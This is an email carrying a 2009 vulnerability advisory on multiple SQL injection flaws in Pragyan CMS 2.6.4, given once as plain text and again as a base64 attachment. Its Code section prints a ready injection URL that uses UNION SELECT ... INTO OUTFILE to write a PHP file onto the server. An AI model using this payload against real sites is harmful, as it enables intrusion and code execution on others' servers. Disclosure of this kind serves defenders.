|
--001485f772b88d403804684e758c
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: Pragyan CMS
[+] Version: 2.6.4
[+] Website: http://www.pragyan.org
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 22 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Risk: hight
[-] Requisites: magic_quotes_gpc = off/on
This web application is entirely vulnerable to
SQL Injection because any variable is not
properly sanitised before being used in an SQL
query. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/?action=view&fileget=-1' UNION ALL SELECT
'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23
*************************************************
[+] Fix
You must sanitise any user input.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001485f772b88d403804684e758c
Content-Type: text/plain; charset=US-ASCII;
name="Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities-22042009.txt"
Content-Disposition: attachment;
filename="Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities-22042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftx0vnhd0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBQcmFneWFuIENNUwpbK10gVmVyc2lvbjogMi42LjQKWytdIFdlYnNpdGU6IGh0
dHA6Ly93d3cucHJhZ3lhbi5vcmcKClsrXSBCdWdzOiBbQV0gTXVsdGlwbGUgU1FMIEluamVjdGlv
bgoKWytdIEV4cGxvaXRhdGlvbjogUmVtb3RlClsrXSBEYXRlOiAyMiBBcHIgMjAwOQoKWytdIERp
c2NvdmVyZWQgYnk6IFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBBdXRob3I6IFNh
bHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhClsrXSBDb250YWN0OiBlLW1haWw6IGRyb3NvcGhp
bGF4eHhAZ21haWwuY29tCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKgoKWytdIE1lbnUKCjEpIEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQnVncwoKCi0gW0Fd
IE11bHRpcGxlIFNRTCBJbmplY3Rpb24KClstXSBSaXNrOiBoaWdodApbLV0gUmVxdWlzaXRlczog
bWFnaWNfcXVvdGVzX2dwYyA9IG9mZi9vbgoKVGhpcyB3ZWIgYXBwbGljYXRpb24gaXMgZW50aXJl
bHkgdnVsbmVyYWJsZSB0byAKU1FMIEluamVjdGlvbiBiZWNhdXNlIGFueSB2YXJpYWJsZSBpcyBu
b3QgCnByb3Blcmx5IHNhbml0aXNlZCBiZWZvcmUgYmVpbmcgdXNlZCBpbiBhbiBTUUwgCnF1ZXJ5
LiBUaGlzIGNhbiBiZSBleHBsb2l0ZWQgdG8gbWFuaXB1bGF0ZSBTUUwgCnF1ZXJpZXMgYnkgaW5q
ZWN0aW5nIGFyYml0cmFyeSBTUUwgY29kZS4KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqCgpbK10gQ29kZQoKCi0gW0FdIE11bHRpcGxlIFNRTCBJbmpl
Y3Rpb24KCmh0dHA6Ly93d3cuc2l0ZS5jb20vcGF0aC8/YWN0aW9uPXZpZXcmZmlsZWdldD0tMScg
VU5JT04gQUxMIFNFTEVDVCAnZXZpbF9jb2RlJywyLDMsNCw1LDYsNyBJTlRPIE9VVEZJTEUgJy9w
YXRoL2V2aWwucGhwJyUyMwoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioKClsrXSBGaXgKCllvdSBtdXN0IHNhbml0aXNlIGFueSB1c2VyIGlucHV0LgoK
CioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKio--001485f772b88d403804684e758c--